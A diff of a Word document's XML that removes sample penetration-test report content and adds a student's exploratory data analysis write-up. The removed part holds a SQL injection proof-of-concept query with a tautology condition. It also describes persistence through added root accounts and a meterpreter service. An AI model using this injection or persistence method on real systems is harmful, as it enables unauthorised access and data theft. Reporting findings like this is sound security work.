-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Vulnerability Explanation</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve">: A custom web application identified was prone to SQL Injection attacks. When performing the penetration test, John noticed error-based MySQL Injection on the </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>taxid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> query string parameter. While enumerating table data, John was able to successfully extract login and password credentials that were unencrypted that also matched username and password accounts for the root user account on the operating system. This allowed for a successful breach of the Linux-based operating system as well as all data contained on the system.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Vulnerability Fix</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve">: Since this is a custom web application, a specific update will not properly solve this issue. The application will need to be programmed to properly sanitize user-input data, ensure that the user is running </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>off of</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> a limited user account, and that any sensitive data stored within the SQL database is properly encrypted. Custom error messages are highly recommended, as it becomes more challenging for the attacker to exploit a given weakness if errors are not being presented back to them.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Severity: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-                <w:color w:val="FF0000"/>
-                <w:u w:color="FF0000"/>
-              </w:rPr>
-              <w:t>Critical</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Proof of Concept Code Here:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE “%root%"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="192" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="192" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-                  <w14:noFill/>
-                  <w14:prstDash w14:val="solid"/>
-                  <w14:bevel/>
-                </w14:textOutline>
-              </w:rPr>
-              <w:drawing>
-                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="783D2DDE" wp14:editId="5E158F03">
-                  <wp:simplePos x="0" y="0"/>
-                  <wp:positionH relativeFrom="column">
-                    <wp:posOffset>-44450</wp:posOffset>
-                  </wp:positionH>
-                  <wp:positionV relativeFrom="paragraph">
-                    <wp:posOffset>231140</wp:posOffset>
-                  </wp:positionV>
-                  <wp:extent cx="3625215" cy="419100"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:wrapTight wrapText="bothSides">
-                    <wp:wrapPolygon edited="0">
-                      <wp:start x="0" y="0"/>
-                      <wp:lineTo x="0" y="20618"/>
-                      <wp:lineTo x="21452" y="20618"/>
-                      <wp:lineTo x="21452" y="0"/>
-                      <wp:lineTo x="0" y="0"/>
-                    </wp:wrapPolygon>
-                  </wp:wrapTight>
-                  <wp:docPr id="3" name="Picture 3"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="3" name="Picture 3"/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId12">
-                            <a:extLst>
-                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                              </a:ext>
-                            </a:extLst>
-                          </a:blip>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3625215" cy="419100"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:anchor>
-              </w:drawing>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Screenshot Here:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
               <w:spacing w:line="192" w:lineRule="auto"/>
               <w:jc w:val="both"/>
             </w:pPr>
@@ -11695,7 +9653,7 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc59959356"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc59959356"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="None"/>
@@ -11707,7 +9665,7 @@
         </w:rPr>
         <w:t>3.4 Sample Report – Maintaining Access</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11724,57 +9682,7 @@
           <w:rStyle w:val="None"/>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>i.e.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">John added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> service was installed on the machine to ensure that additional access could be established.</w:t>
+        <w:t xml:space="preserve">Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11789,7 +9697,7 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc59959357"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc59959357"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="None"/>
@@ -11799,7 +9707,6 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">3.5 </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -11837,7 +9744,7 @@
         </w:rPr>
         <w:t>– House Cleaning</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11854,23 +9761,7 @@
           <w:rStyle w:val="None"/>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t xml:space="preserve">The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>meticulous</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and no remnants of our penetration test are left over is important.</w:t>
+        <w:t xml:space="preserve">The </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11906,7 +9797,7 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc59959358"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc59959358"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="None"/>
@@ -11918,9 +9809,10 @@
           <w:szCs w:val="30"/>
           <w:u w:color="000000"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>4.0 Additional Items Not Mentioned in the Report</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11932,7 +9824,7 @@
           <w:rStyle w:val="None"/>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>This section is placed for any additional items that were not mentioned in the overall report.</w:t>
+        <w:t>This section is placed in the overall report.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11989,284 +9881,6 @@
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>CONTENTS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Abstract </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">-------------------------------------- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1 Data preparation and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Visualization </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ----------------------------</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:keepNext w:val="0"/>
-        <w:keepLines w:val="0"/>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Data preparation and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Visualization :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Graded out of 100)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rStyle w:val="hgkelc"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Perform appropriate </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">EDA </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Early data analysis / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hgkelc"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Exploratory data analysis</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hgkelc"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (EDA).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:after="0"/>
-        <w:ind w:left="1080" w:firstLine="360"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Method chosen and Insights.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      </w:t>
-      </w:r>
-      <w:r>
-        <w:t>You must also rationalise justify and detail all the methods used to prepare the data for ML.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Appropriate visualizations must be used to engender insight into the dataset and to illustrate your final insights gained in your analysis. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="300"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>4.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">All design and implementation of your visualizations must be justified and detailed in full. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12848,19 +10462,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Ireland?</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> Ireland?</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13162,6 +10765,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">I chose these methods because they will allow me to gain insights </w:t>
       </w:r>
       <w:r>
@@ -13311,25 +10915,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Phase 01 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>-  EDA</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Phase 01 -  EDA:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13348,33 +10934,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">In the phase 01, I </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">will  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>organize</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and clean the data, </w:t>
+        <w:t xml:space="preserve">In the phase 01, I will  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">organize and clean the data, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13409,18 +10977,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">, I will check if is there any null </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>value .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>, I will check if is there any null value .</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13522,7 +11080,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Here are some specific examples of insights that I might gain from EDA:</w:t>
       </w:r>
     </w:p>
@@ -13745,21 +11302,13 @@
         </w:rPr>
         <w:t xml:space="preserve"> We need to </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>visualize,  clean</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>, verify if is there any “bad data” (null or bad formatted data), and after merge these datasets.</w:t>
+        <w:lastRenderedPageBreak/>
